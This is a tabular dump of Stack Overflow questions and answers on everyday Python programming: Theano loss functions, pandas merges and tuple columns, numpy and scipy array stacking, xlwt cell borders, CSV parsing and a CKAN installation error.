title
stringlengths
10
172
question_id
int64
469
40.1M
question_body
stringlengths
22
48.2k
question_score
int64
-44
5.52k
question_date
stringlengths
20
20
answer_id
int64
497
40.1M
answer_body
stringlengths
18
33.9k
answer_score
int64
-38
8.38k
answer_date
stringlengths
20
20
tags
listlengths
1
5
Tilted loss in theano
38,497,955
<p>I am trying to calculate the tilted loss, which in turn will be used in Keras. However, I must be doing something wrong since I am getting negative loss values (which ought to be impossible). Can anyone point out what I've done wrong. I'm assuming it's the theano syntax that I have got wrong.</p> <p>The loss is defined mathematically as: <a href="http://i.stack.imgur.com/FWlAs.png" rel="nofollow"><img src="http://i.stack.imgur.com/FWlAs.png" alt="enter image description here"></a> where $\xi_i = y_i - f_i$ where $y_i$ is the observation and $f_i$ is the prediction. Furthermore I am after the mean loss, thus I have defined my loss function as:</p> <pre><code>$$ \mathcal{L} = \frac{\alpha\sum \xi_i-\sum I(\xi_i&lt;0)\xi_i}{N} $$ </code></pre> <p>where $I()$ is the indicator function and takes on the values 1 if true.</p> <p>Hence my loss function is defined as follows:</p> <pre><code>def tilted_loss2(y,f): q = 0.05 e = (y-f) return (q*tt.sum(e)-tt.sum(e[e&lt;0]))/e.shape[0] </code></pre> <p>however, when I run my network I get negative values. Is there something wrong with the theano syntax here? my biggest suspicion is here: <code>tt.sum(e[e&lt;0]))</code>. Can you slice it like this?</p> <p>Any thoughts would be appreciated.</p>
0
2016-07-21T07:40:16Z
38,501,057
<p>You can not slice like this. <a href="http://stackoverflow.com/questions/37425401/theano-tensor-slicing-how-to-use-boolean-to-slice/37425475#37425475">see this answer</a></p> <p>You need to change your loss function as follows:</p> <pre><code>def tilted_loss2(y,f): q = 0.05 e = (y-f) return (q*tt.sum(e)-tt.sum(e[(e&lt;0).nonzero()]))/e.shape[0] </code></pre> <p>You can also try this work-around using <code>abs</code> function instead of complex slicing syntax that might not work:</p> <pre><code>def tilted_loss2(y,f): q = 0.05 e = (y-f) return (q*tt.sum(e)-tt.sum(e-abs(e))/2.)/e.shape[0] </code></pre>
2
2016-07-21T10:00:58Z
[ "python", "theano", "keras" ]
PyFann data format for list described dataset
38,498,119
<p>I am working on detection of regions of specific tree in an aerial image and my approach is using texture detection. I have 4 descriptors/features and I want to use FANN to create a machine learning environment that would detect properly the regions.</p> <p>My question is, is the format I am reading, regarding the input of pyfann, always as described in <a href="http://stackoverflow.com/a/25703709/5722784">http://stackoverflow.com/a/25703709/5722784</a> ? </p> <p>What if I would like to have 4 input neurons and one output neuron, where for each input neuron I have a list (not a single integer) that I would like to feed on it? Can FANN provide it? If so, what's the format that I have to follow in making the input data? </p> <p>Thank you so much for significant responses :) </p>
0
2016-07-21T07:48:35Z
39,946,524
<p>Each input neuron can only take a single input - this is the case for all neural networks, irrespective of the library you use. I would suggest using each element in each of your lists as an input to the neural network, e.g. inputs 1-5 are your first list and then 6-10 are your second list. If you have variable length lists you likely have a problem, though.</p>
0
2016-10-09T17:37:06Z
[ "python", "neural-network", "fann" ]
Accessing original function variables in decorators
38,498,159
<p>I'm making a logging module in python which reports every exception that happens in run-time to a server, so in every function I have to write:</p> <pre><code>def a_func(): try: #stuff here pass except: Logger.writeError(self.__class__.__name__, inspect.stack()[1][3],\ tracer(self, vars())) </code></pre> <p>As you can see I'm using vars() function to get the variables which caused the exception. I read about decorators and I decided to use them:</p> <pre><code>def flog(func): def flog_wrapper(*args, **kwargs): try: func(*args, **kwargs) except Exception as e: print "At flog:", e #self.myLogger.writeError(self.__class__.__name__, inspect.stack()[1][3], tracer(self, vars())) return flog_wrapper </code></pre> <p>The problem is I don't have access to the original function's (func) variables (vars()) here. Is there a way to access them in the decorator function?</p>
0
2016-07-21T07:50:29Z
38,498,394
<p>You don't need to use <code>vars()</code>. The <em>traceback</em> of an exception has everything you need:</p> <pre><code>import sys def flog(func): def flog_wrapper(self, *args, **kwargs): try: return func(self, *args, **kwargs) except Exception: exc_type, exc_value, tb = sys.exc_info() print "At flog:", exc_value locals = tb.tb_frame.f_locals self.myLogger.writeError(type(self).__name__, inspect.stack()[1][3], tracer(self, locals)) del tb return flog_wrapper </code></pre> <p>The traceback contains a chained series of execution frames; each frame has a reference to the locals used in that frame.</p> <p>You do very much want to clean up the reference to the traceback; because the traceback includes the wrapper function frame, you have a circular reference and that is best broken early.</p>
0
2016-07-21T08:02:42Z
[ "python", "python-2.7", "python-decorators" ]
How do I get all values from one position in a tuple in a pandas dataframe column?
38,498,239
<p>I have a pandas dataframe where several columns are filled with tuples with two values each, mixed types.</p> <p>Example:</p> <pre><code>import pandas as pd D = [{'A':1,'B':'Test1','C':('C1',True)},\ {'A':2,'B':'Test2','C':(77,u'orz')},\ {'A':3,'B':'Test3','C':(u'ASDFG',[1,2,3])}] F = pd.DataFrame.from_dict(D) print F </code></pre> <p>This is the normal output:</p> <pre><code> A B C 0 1 Test1 (C1, True) 1 2 Test2 (77, orz) 2 3 Test3 (ASDFG, [1, 2, 3]) </code></pre> <p>And what I want is e.g. the second value from each tuple in column C, that is an output like:</p> <pre><code>True, orz, [1,2,3] </code></pre> <p>In Numpy you can do this:</p> <pre><code>import numpy as np A = np.array([[1,2,3],[4,5,6],[7,8,9]]) print A[:,0] </code></pre> <p>Giving you:</p> <pre><code>[1 4 7] </code></pre> <p>But this doesn't work in pandas, so is there any way to do this or do I have to transform the data in a different way?</p>
1
2016-07-21T07:54:28Z
38,498,294
<p>One way is to use a list comprehension and extract the second item in the tuple pair.</p> <pre><code>&gt;&gt;&gt; [tup[1] for tup in F.C] [True, u'orz', [1, 2, 3]] </code></pre>
2
2016-07-21T07:57:09Z
[ "python", "numpy", "pandas" ]
How do I get all values from one position in a tuple in a pandas dataframe column?
38,498,239
<p>I have a pandas dataframe where several columns are filled with tuples with two values each, mixed types.</p> <p>Example:</p> <pre><code>import pandas as pd D = [{'A':1,'B':'Test1','C':('C1',True)},\ {'A':2,'B':'Test2','C':(77,u'orz')},\ {'A':3,'B':'Test3','C':(u'ASDFG',[1,2,3])}] F = pd.DataFrame.from_dict(D) print F </code></pre> <p>This is the normal output:</p> <pre><code> A B C 0 1 Test1 (C1, True) 1 2 Test2 (77, orz) 2 3 Test3 (ASDFG, [1, 2, 3]) </code></pre> <p>And what I want is e.g. the second value from each tuple in column C, that is an output like:</p> <pre><code>True, orz, [1,2,3] </code></pre> <p>In Numpy you can do this:</p> <pre><code>import numpy as np A = np.array([[1,2,3],[4,5,6],[7,8,9]]) print A[:,0] </code></pre> <p>Giving you:</p> <pre><code>[1 4 7] </code></pre> <p>But this doesn't work in pandas, so is there any way to do this or do I have to transform the data in a different way?</p>
1
2016-07-21T07:54:28Z
38,499,436
<p>If you prefer to stay in the pandas DafaFrame / Series domain:</p> <pre><code>F.C.apply(lambda x: x[-1]) </code></pre> <p>Returns:</p> <pre><code>&gt;&gt;&gt; F.C.apply(lambda x: x[-1]) 0 True 1 orz 2 [1, 2, 3] Name: C, dtype: object </code></pre>
1
2016-07-21T08:51:23Z
[ "python", "numpy", "pandas" ]
How can I map an ontology components to a relational database?
38,498,290
<p>I already have an owl ontology which contains classes, instances and object properties. How can I map them to a relational data base such as MYSQL using a Python as a programming language(I prefer Python) ?<br> <strong>For example</strong>, an ontology can contains the classes: "Country and city" and instances like: "United states and NYC". So I need manage to store them in relational data bases' tables. I would like to know if there is some Python libraries to so. </p>
0
2016-07-21T07:56:54Z
38,498,458
<p>If I understand you well, I think you could use SQLite with python. SQLite is great because you have just to import the library with :</p> <pre><code>import sqlite3 </code></pre> <p>And then, there is no need for a server. Things are stored in a file, gerenaly ending with : <code>.db</code></p> <p>Have a look at the doc, the example are helpful : <a href="https://docs.python.org/2/library/sqlite3.html" rel="nofollow">https://docs.python.org/2/library/sqlite3.html</a></p> <p><strong>EDIT :</strong> To review or create your database and tables, I advise you tu use sqlitebrowser, which is light and easy to use : <a href="http://sqlitebrowser.org/" rel="nofollow">http://sqlitebrowser.org/</a></p>
0
2016-07-21T08:06:13Z
[ "python", "mysql", "relational-database", "semantic-web", "ontology" ]
How can I map an ontology components to a relational database?
38,498,290
<p>I already have an owl ontology which contains classes, instances and object properties. How can I map them to a relational data base such as MYSQL using a Python as a programming language(I prefer Python) ?<br> <strong>For example</strong>, an ontology can contains the classes: "Country and city" and instances like: "United states and NYC". So I need manage to store them in relational data bases' tables. I would like to know if there is some Python libraries to so. </p>
0
2016-07-21T07:56:54Z
38,534,519
<p>Use the right tool for the job. You're using RDF, that it's OWL axioms is immaterial, and you want to store and query it. Use an RDF database. They're optimized for storing and querying RDF. It's a waste of your time to homegrow storage &amp; query in MySQL when other folks have already figured out how best to do this.</p> <p>As an aside, there is a way to map RDF to a relational database. There's a formal specification for this, it's called R2RML.</p>
0
2016-07-22T20:08:00Z
[ "python", "mysql", "relational-database", "semantic-web", "ontology" ]
How to column_stack a numpy array with a scipy sparse matrix?
38,498,299
<p>I have the following matrices:</p> <pre><code>A.toarray() array([[0, 0, 0, ..., 0, 0, 0], [0, 0, 0, ..., 0, 0, 0], [0, 0, 0, ..., 0, 0, 0], ..., [0, 0, 0, ..., 0, 0, 0], [0, 0, 0, ..., 0, 0, 0], [0, 0, 0, ..., 0, 0, 0]], dtype=int64) type(A) scipy.sparse.csr.csr_matrix A.shape (878049, 942) </code></pre> <p>And matrix B:</p> <pre><code>B array([2248, 2248, 2248, ..., 0, 0, 0]) type(B) numpy.ndarray B.shape (878049,) </code></pre> <p>I would like to column stack <code>A</code> and <code>B</code> in C, I tried the folowing:</p> <pre><code>C = sparse.column_stack([A,B]) </code></pre> <p>Then:</p> <pre><code>/usr/local/lib/python3.5/site-packages/numpy/lib/shape_base.py in column_stack(tup) 315 arr = array(arr, copy=False, subok=True, ndmin=2).T 316 arrays.append(arr) --&gt; 317 return _nx.concatenate(arrays, 1) 318 319 def dstack(tup): ValueError: all the input array dimensions except for the concatenation axis must match exactly </code></pre> <p>My problem is how can I preserve the dimentions. Thus, any idea of how to column stack them?.</p> <p><strong>Update</strong></p> <p>I tried the following:</p> <pre><code>#Sorry for the name C = np.vstack(( A.A.T, B)).T </code></pre> <p>and I got:</p> <pre><code>array([[ 0, 0, 0, ..., 0, 6], [ 0, 0, 0, ..., 0, 6], [ 0, 0, 0, ..., 0, 6], ..., [ 0, 0, 0, ..., 0, 1], [ 0, 0, 0, ..., 0, 1], [ 0, 0, 0, ..., 0, 1]], dtype=int64) </code></pre> <p><strong>Is this the correct way to column stack them?.</strong></p>
0
2016-07-21T07:57:38Z
38,498,421
<p>Did you try the following? </p> <pre><code>C=np.vstack((A.T,B)).T </code></pre> <p>With sample values:</p> <pre><code>A = array([[1, 2, 3], [4, 5, 6]]) &gt;&gt;&gt;&gt; A.shape (2, 3) B = array([7, 8]) &gt;&gt;&gt; B.shape (2,) C=np.vstack((A.T,B)).T &gt;&gt;&gt; C.shape (2, 4) </code></pre> <p>If A is a sparse matrix, and you want to maintain the output as sparse, you could do:</p> <pre><code>C=np.vstack((A.A.T,B)).T D=csr_matrix((C)) </code></pre>
1
2016-07-21T08:04:15Z
[ "python", "python-2.7", "python-3.x", "numpy", "scipy" ]
How to column_stack a numpy array with a scipy sparse matrix?
38,498,299
<p>I have the following matrices:</p> <pre><code>A.toarray() array([[0, 0, 0, ..., 0, 0, 0], [0, 0, 0, ..., 0, 0, 0], [0, 0, 0, ..., 0, 0, 0], ..., [0, 0, 0, ..., 0, 0, 0], [0, 0, 0, ..., 0, 0, 0], [0, 0, 0, ..., 0, 0, 0]], dtype=int64) type(A) scipy.sparse.csr.csr_matrix A.shape (878049, 942) </code></pre> <p>And matrix B:</p> <pre><code>B array([2248, 2248, 2248, ..., 0, 0, 0]) type(B) numpy.ndarray B.shape (878049,) </code></pre> <p>I would like to column stack <code>A</code> and <code>B</code> in C, I tried the folowing:</p> <pre><code>C = sparse.column_stack([A,B]) </code></pre> <p>Then:</p> <pre><code>/usr/local/lib/python3.5/site-packages/numpy/lib/shape_base.py in column_stack(tup) 315 arr = array(arr, copy=False, subok=True, ndmin=2).T 316 arrays.append(arr) --&gt; 317 return _nx.concatenate(arrays, 1) 318 319 def dstack(tup): ValueError: all the input array dimensions except for the concatenation axis must match exactly </code></pre> <p>My problem is how can I preserve the dimentions. Thus, any idea of how to column stack them?.</p> <p><strong>Update</strong></p> <p>I tried the following:</p> <pre><code>#Sorry for the name C = np.vstack(( A.A.T, B)).T </code></pre> <p>and I got:</p> <pre><code>array([[ 0, 0, 0, ..., 0, 6], [ 0, 0, 0, ..., 0, 6], [ 0, 0, 0, ..., 0, 6], ..., [ 0, 0, 0, ..., 0, 1], [ 0, 0, 0, ..., 0, 1], [ 0, 0, 0, ..., 0, 1]], dtype=int64) </code></pre> <p><strong>Is this the correct way to column stack them?.</strong></p>
0
2016-07-21T07:57:38Z
38,518,846
<p>2 issues </p> <ul> <li>there isn't a <code>sparse.column_stack</code></li> <li>you are mixing a sparse matrix and dense array</li> </ul> <p>2 smaller examples:</p> <pre><code>In [129]: A=sparse.csr_matrix([[1,0,0],[0,1,0]]) In [130]: B=np.array([1,2]) </code></pre> <p>Using <code>np.column_stack</code> gives your error:</p> <pre><code>In [131]: np.column_stack((A,B)) ... ValueError: all the input array dimensions except for the concatenation axis must match exactly </code></pre> <p>But if I first turn <code>A</code> into an array, column_stack does fine:</p> <pre><code>In [132]: np.column_stack((A.A, B)) Out[132]: array([[1, 0, 0, 1], [0, 1, 0, 2]]) </code></pre> <p>the equivalent with <code>concatenate</code>:</p> <pre><code>In [133]: np.concatenate((A.A, B[:,None]), axis=1) Out[133]: array([[1, 0, 0, 1], [0, 1, 0, 2]]) </code></pre> <p>there is a <code>sparse.hstack</code>. For that I need to turn <code>B</code> into a sparse matrix as well. Transpose works because it is now a matrix (as opposed to a 1d array):</p> <pre><code>In [134]: sparse.hstack((A,sparse.csr_matrix(B).T)) Out[134]: &lt;2x4 sparse matrix of type '&lt;class 'numpy.int32'&gt;' with 4 stored elements in COOrdinate format&gt; In [135]: _.A Out[135]: array([[1, 0, 0, 1], [0, 1, 0, 2]], dtype=int32) </code></pre>
1
2016-07-22T05:30:27Z
[ "python", "python-2.7", "python-3.x", "numpy", "scipy" ]
Unexpected behaviour of border: * no_line
38,498,392
<p>I am trying to create cells without borders, but somehow that default thin border is always there.</p> <pre class="lang-python prettyprint-override"><code>from xlwt import Workbook,easyxf tl = easyxf('border: top thick, right no_line, bottom no_line, left thick') tr = easyxf('border: top thick, right thick, bottom no_line, left no_line') br = easyxf('border: top no_line, right thick, bottom thick, left no_line') bl = easyxf('border: top no_line, right no_line, bottom thick, left thick') w = Workbook() ws = w.add_sheet('Border') ws.write(1, 1, style=tl) ws.write(1, 2, style=tr) ws.write(2, 1, style=bl) ws.write(2, 2, style=br) w.save('borders-test.xls') </code></pre> <p>What I get is</p> <p><a href="http://i.stack.imgur.com/ZeNf8.png" rel="nofollow"><img src="http://i.stack.imgur.com/ZeNf8.png" alt="Result"></a> </p> <p>However I would expect (no thin borders within thick borders)</p> <p><a href="http://i.stack.imgur.com/hqbcS.png" rel="nofollow"><img src="http://i.stack.imgur.com/hqbcS.png" alt="Expectation"></a></p> <p>I am looking for the solution to make <code>no_line</code> work as expected (or to understand that it is actually some different thing and adjust my expectations). I am however not looking for workarounds like "set color of border the same as background" (unless it is known that GUIs work the very same way).</p> <pre><code>Python 3.5.2 |Continuum Analytics, Inc.| (default, Jul 2 2016, 17:52:12) [GCC 4.2.1 Compatible Apple LLVM 4.2 (clang-425.0.28)] on darwin xlwt==1.1.2 </code></pre> <p>p.s. Simply removing <code>... no_line</code> parts from code (as it is default) does not make any difference.</p>
0
2016-07-21T08:02:40Z
39,062,012
<p>Use top_color <em>color</em> , bottom_color <em>color</em> , left_color <em>color</em> , right_color <em>color</em> which in your case it should be white. </p> <p>Where ever you dont want border for example in <strong>tl</strong> you dont want border at right and bottom so set right_color white, bottom_color white.</p> <pre><code> from xlwt import Workbook,easyxf tl = easyxf('border: top thick, bottom thick, left thick, right thick, right_color white, bottom_color white') tr = easyxf('border: top thick, bottom thick, left thick, right thick, left_color white, bottom_color white') br = easyxf('border: top thick, bottom thick, left thick, right thick, left_color white, top_color white') bl = easyxf('border: top thick, bottom thick, left thick, right thick, right_color white, top_color white') w = Workbook() ws = w.add_sheet('Border') ws.write(1, 1, style=tl) ws.write(1, 2, style=tr) ws.write(2, 1, style=bl) ws.write(2, 2, style=br) w.save('borders-test.xls') </code></pre> <p>Hope this solves your problem.</p>
0
2016-08-21T07:48:09Z
[ "python", "xlwt" ]
Read csv to dict of dicts
38,498,419
<p>Lets say I have this csv file:</p> <pre><code>Header1, Header2, Header3 key1, 1, 2 key2, 3, 4 </code></pre> <p>I'd like to convert it to the following dict:</p> <pre><code>{Header2: {key1: 1, key2: 3}, Header3: {key1: 2, key2: 4}} </code></pre> <p>Is there a simple way to do this? I tried using csv DictReader or pandas, but did not get a simple way, although this looks to me like a common use case.</p>
2
2016-07-21T08:04:11Z
38,498,744
<p>You can use <code>to_dict</code> method of pandas' DataFrame instance. For example:</p> <pre><code>import pandas as pd df = pd.read_csv('file.csv', delimiter=r',\s+', index_col=0) print(df.to_dict()) </code></pre>
2
2016-07-21T08:19:06Z
[ "python", "csv", "dictionary" ]
Read csv to dict of dicts
38,498,419
<p>Lets say I have this csv file:</p> <pre><code>Header1, Header2, Header3 key1, 1, 2 key2, 3, 4 </code></pre> <p>I'd like to convert it to the following dict:</p> <pre><code>{Header2: {key1: 1, key2: 3}, Header3: {key1: 2, key2: 4}} </code></pre> <p>Is there a simple way to do this? I tried using csv DictReader or pandas, but did not get a simple way, although this looks to me like a common use case.</p>
2
2016-07-21T08:04:11Z
38,498,891
<p>You can do this with <code>csv</code> module:</p> <pre><code>import csv f = open(csv_file_path) reader = csv.DictReader(f) fieldnames = reader.fieldnames result = {fieldname:{} for fieldname in fieldnames[1:]} for row in reader: for fieldname in fieldnames[1:]: result[fieldname][row['Header1'].strip()] = row[fieldname].strip() </code></pre>
0
2016-07-21T08:26:25Z
[ "python", "csv", "dictionary" ]
Merge two data frames on multiple values
38,498,453
<p>I have two data frames which look like this</p> <p><strong>df1</strong></p> <pre><code> name ID abb 0 foo 251803 I 1 bar 376811 R 2 baz 174254 Q 3 foofoo 337144 IRQ 4 barbar 306521 IQ </code></pre> <p><strong>df2</strong></p> <pre><code> abb comment 0 I fine 1 R repeat 2 Q other </code></pre> <p>I am trying to use pandas <code>merge</code> to join the two data frames and simply assign the <code>comment</code> column in the second data frame to the first based on the <code>abb</code> column in the following way:</p> <pre><code>df1.merge(df2, how='inner', on='abb') </code></pre> <p>resulting in:</p> <pre><code> name ID abb comment 0 foo 251803 I fine 1 bar 376811 R repeat 2 baz 174254 Q other </code></pre> <p>This works well for the unique one letter identifiers in <code>abb</code>. However, it obviously fails for more than one character. </p> <p>I tried to use <code>list</code> on the <code>abb</code> column in first data frame but this results in a <code>KeyError</code>.</p> <p>What I would like to do is the following.</p> <p>1) Seperate the rows containing more than one character in this column into several rows</p> <p>2) Merge the data frames</p> <p>3) Optionally: Combine the rows again</p>
1
2016-07-21T08:05:55Z
38,498,580
<p>Use <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.join.html" rel="nofollow"><code>join</code></a>:</p> <pre><code>print (df1) name ID abb 0 foo 251803 I 1 bar 376811 R 2 baz 174254 Q 3 foofoo 337144 IRQ 4 barbar 306521 IQ #each character to df, which is stacked to Series s = df1.abb.apply(lambda x: pd.Series(list(x))) .stack() .reset_index(drop=True, level=1) .rename('abb') print (s) 0 I 1 R 2 Q 3 I 3 R 3 Q 4 I 4 Q Name: abb, dtype: object df1 = df1.drop('abb', axis=1).join(s) print (df1) name ID abb 0 foo 251803 I 1 bar 376811 R 2 baz 174254 Q 3 foofoo 337144 I 3 foofoo 337144 R 3 foofoo 337144 Q 4 barbar 306521 I 4 barbar 306521 Q </code></pre>
2
2016-07-21T08:11:50Z
[ "python", "pandas" ]
Merge two data frames on multiple values
38,498,453
<p>I have two data frames which look like this</p> <p><strong>df1</strong></p> <pre><code> name ID abb 0 foo 251803 I 1 bar 376811 R 2 baz 174254 Q 3 foofoo 337144 IRQ 4 barbar 306521 IQ </code></pre> <p><strong>df2</strong></p> <pre><code> abb comment 0 I fine 1 R repeat 2 Q other </code></pre> <p>I am trying to use pandas <code>merge</code> to join the two data frames and simply assign the <code>comment</code> column in the second data frame to the first based on the <code>abb</code> column in the following way:</p> <pre><code>df1.merge(df2, how='inner', on='abb') </code></pre> <p>resulting in:</p> <pre><code> name ID abb comment 0 foo 251803 I fine 1 bar 376811 R repeat 2 baz 174254 Q other </code></pre> <p>This works well for the unique one letter identifiers in <code>abb</code>. However, it obviously fails for more than one character. </p> <p>I tried to use <code>list</code> on the <code>abb</code> column in first data frame but this results in a <code>KeyError</code>.</p> <p>What I would like to do is the following.</p> <p>1) Seperate the rows containing more than one character in this column into several rows</p> <p>2) Merge the data frames</p> <p>3) Optionally: Combine the rows again</p>
1
2016-07-21T08:05:55Z
38,499,036
<p>See this <a href="http://stackoverflow.com/a/38432346/2336654">answer</a> for various ways to explode on a column</p> <pre><code>rows = [] for i, row in df1.iterrows(): for a in row.abb: rows.append([row['ID'], a, row['name']]) df11 = pd.DataFrame(rows, columns=df1.columns) df11.merge(df2) </code></pre> <p><a href="http://i.stack.imgur.com/oGuAA.png" rel="nofollow"><img src="http://i.stack.imgur.com/oGuAA.png" alt="enter image description here"></a></p>
1
2016-07-21T08:32:26Z
[ "python", "pandas" ]
Write numpy structured array using savetxt
38,498,477
<p>I faced a problem with writing structured array in txt file. Having an output file (<em>outfile</em>) opened, I use the following numpy function:</p> <pre><code>np.savetxt(*outfile*, ***recarray***, fmt=['%s','%-7.4f','%-7.4f','%-7.4f']) </code></pre> <p>The <strong><em>recarray</em></strong> is like [ (b'H', 0.9425, 0.1412, 7.1414) ... (b'N', 1.0037, 4.0524, 6.8000) ], where the first element has <code>numpy.bytes_</code> type and others are <code>numpy.float64</code>. </p> <p>An error message appears while writing this recarray in file:</p> <pre><code>TypeError: must be str, not bytes </code></pre> <p>So, what is the easiest way to put this array in file? Maybe there is another function?</p>
0
2016-07-21T08:06:58Z
38,498,626
<p>I assume that you are using Python 3.0. In this case, you have to specify before <code>'%s'</code> the letter b like this : <code>b'%s'</code></p> <p>In Python3, the default string type is unicode, so you have use the extra b to mark byte strings.</p> <p>Your script should be : </p> <pre><code>np.savetxt(*outfile*, ***recarray***, fmt=[b'%s','%-7.4f','%-7.4f','%-7.4f']) </code></pre> <p>Don't forget to write <code>wb</code> when you are opening your .txt file :</p> <pre><code>file = open('workfile.txt','wb') </code></pre>
0
2016-07-21T08:13:51Z
[ "python", "numpy" ]
Error when creating Database Tables - CKAN
38,498,590
<p>i'm trying to install CKAN 2.5.2 on Centos 6.8</p> <p>When i run paster db init -c /etc/ckan/default/development.ini</p> <p>i get error </p> <pre><code>Traceback (most recent call last): File "/usr/lib/ckan/default/bin/paster", line 9, in &lt;module&gt; load_entry_point('PasteScript==2.0.2', 'console_scripts', 'paster')() File "/usr/lib/ckan/default/lib/python2.6/site-packages/paste/script/command.py", line 102, in run invoke(command, command_name, options, args[1:]) File "/usr/lib/ckan/default/lib/python2.6/site-packages/paste/script/command.py", line 141, in invoke exit_code = runner.run(args) File "/usr/lib/ckan/default/lib/python2.6/site-packages/paste/script/command.py", line 236, in run result = self.command() File "/usr/lib/ckan/default/src/ckan/ckan/lib/cli.py", line 205, in command self._load_config(cmd!='upgrade') File "/usr/lib/ckan/default/src/ckan/ckan/lib/cli.py", line 142, in _load_config conf = self._get_config() File "/usr/lib/ckan/default/src/ckan/ckan/lib/cli.py", line 139, in _get_config return appconfig('config:' + self.filename) File "/usr/lib/ckan/default/lib/python2.6/site-packages/paste/deploy/loadwsgi.py", line 261, in appconfig global_conf=global_conf) File "/usr/lib/ckan/default/lib/python2.6/site-packages/paste/deploy/loadwsgi.py", line 296, in loadcontext global_conf=global_conf) File "/usr/lib/ckan/default/lib/python2.6/site-packages/paste/deploy/loadwsgi.py", line 320, in _loadconfig return loader.get_context(object_type, name, global_conf) File "/usr/lib/ckan/default/lib/python2.6/site-packages/paste/deploy/loadwsgi.py", line 454, in get_context section) File "/usr/lib/ckan/default/lib/python2.6/site-packages/paste/deploy/loadwsgi.py", line 476, in _context_from_use object_type, name=use, global_conf=global_conf) File "/usr/lib/ckan/default/lib/python2.6/site-packages/paste/deploy/loadwsgi.py", line 406, in get_context global_conf=global_conf) File "/usr/lib/ckan/default/lib/python2.6/site-packages/paste/deploy/loadwsgi.py", line 296, in loadcontext global_conf=global_conf) File "/usr/lib/ckan/default/lib/python2.6/site-packages/paste/deploy/loadwsgi.py", line 328, in _loadegg return loader.get_context(object_type, name, global_conf) File "/usr/lib/ckan/default/lib/python2.6/site-packages/paste/deploy/loadwsgi.py", line 620, in get_context object_type, name=name) File "/usr/lib/ckan/default/lib/python2.6/site-packages/paste/deploy/loadwsgi.py", line 646, in find_egg_entry_point possible.append((entry.load(), protocol, entry.name)) File "/usr/lib/ckan/default/lib/python2.6/site-packages/pkg_resources/__init__.py", line 2229, in load return self.resolve() File "/usr/lib/ckan/default/lib/python2.6/site-packages/pkg_resources/__init__.py", line 2235, in resolve module = __import__(self.module_name, fromlist=['__name__'], level=0) File "/usr/lib/ckan/default/src/ckan/ckan/config/middleware.py", line 28, in &lt;module&gt; from ckan.config.environment import load_environment File "/usr/lib/ckan/default/src/ckan/ckan/config/environment.py", line 18, in &lt;module&gt; import ckan.lib.helpers as h File "/usr/lib/ckan/default/src/ckan/ckan/lib/helpers.py", line 30, in &lt;module&gt; from bleach import clean as clean_html File "/usr/lib/ckan/default/lib/python2.6/site-packages/bleach/__init__.py", line 8, in &lt;module&gt; from html5lib.sanitizer import HTMLSanitizer ImportError: No module named sanitizer </code></pre> <p>I was following <a href="https://github.com/ckan/ckan/wiki/How-to-install-CKAN-2.5.2-on-CentOS-6.8" rel="nofollow">wiki instructions</a> </p> <p>I'm stuck on this step and don't know how to proceed.</p> <p>Module html5lib is imported and updated to latest version. Paster script is executed in virtualenv under root account.</p> <p>Also i'm running all of this in python2.6 since that is default on Centos.</p> <p>Some additional information</p> <p>when i run python and import html5lib and then help(html5lib) i get this</p> <pre><code>&gt;&gt;&gt; import html5lib &gt;&gt;&gt; help(html5lib) Help on package html5lib: NAME html5lib FILE /usr/lib/python2.6/site-packages/html5lib/__init__.py DESCRIPTION HTML parsing library based on the WHATWG "HTML5" specification. The parser is designed to be compatible with existing HTML found in the wild and implements well-defined error recovery that is largely compatible with modern desktop web browsers. Example usage: import html5lib f = open("my_document.html") tree = html5lib.parse(f) PACKAGE CONTENTS _ihatexml _inputstream _tokenizer _trie (package) _utils constants filters (package) html5parser serializer treeadapters (package) treebuilders (package) treewalkers (package) CLASSES __builtin__.object html5lib.html5parser.HTMLParser class HTMLParser(__builtin__.object) | HTML parser. Generates a tree structure from a stream of (possibly | malformed) HTML | | Methods defined here: : </code></pre> <p>There is no sanitizer here. Do i need to use specific version of html5lib? </p> <p>Can anyone help?</p>
2
2016-07-21T08:12:06Z
38,505,591
<p>It looks like you have 2 copies of html5lib installed. When you did help(html5lib) it is showing a copy that is installed in your user's python directory (/usr/lib/python2.6/site-packages/) not the virtualenv that you have ckan (and bleach) installed (/usr/lib/ckan/default/lib/python2.6/site-packages/). So get rid of the former to avoid confusion.</p> <p>Yes I think you have the wrong version of html5lib, since sanitizer is listed in the package contents when I do help.</p> <p>This is the correct version (at the time of writing - in future check what is in requirements.txt):</p> <pre><code>$ pip freeze | grep html5lib html5lib==0.9999999 </code></pre>
1
2016-07-21T13:27:41Z
[ "python", "centos", "virtualenv", "ckan", "paster" ]
Extracting portions of low-dimensional numpy array into final axes of higher-dimensional array
38,498,654
<p>I have a static shape-<code>(l,l)</code> array <code>C</code>. I want to extract portions of it into some other array <code>K</code>, which has shape <code>(m,m,n,n)</code>. The starting index of what I want to extract from <code>C</code> is given in array <code>i0</code>, which has shape <code>(m,m)</code>.</p> <p>Some element of <code>K</code> will be given by <code>K[i,j,:,:] = C[i0[i,j]:i0[i,j]+n, i0[i,j]:i0[i,j]+n]</code>. So going off some other similar questions it seemed like this might do the job...</p> <pre><code>C[i0[None, None, ...] + np.arange(n)[..., None, None], i0[None, None, ...] + np.arange(n)[..., None, None], I, J] </code></pre> <p>which raises an <code>IndexError</code>. I guess this is because <code>C</code> is only 2D, and the dimensions can't be increased. Though that could be easily fixed by tiling <code>C</code>, since <code>C</code> is large, that would be rather expensive to remake <code>m*m</code> times.</p> <p>So my question is how to extract different (2D) portions of a 2D array into corresponding portions of a 4D array.</p>
1
2016-07-21T08:15:08Z
38,499,028
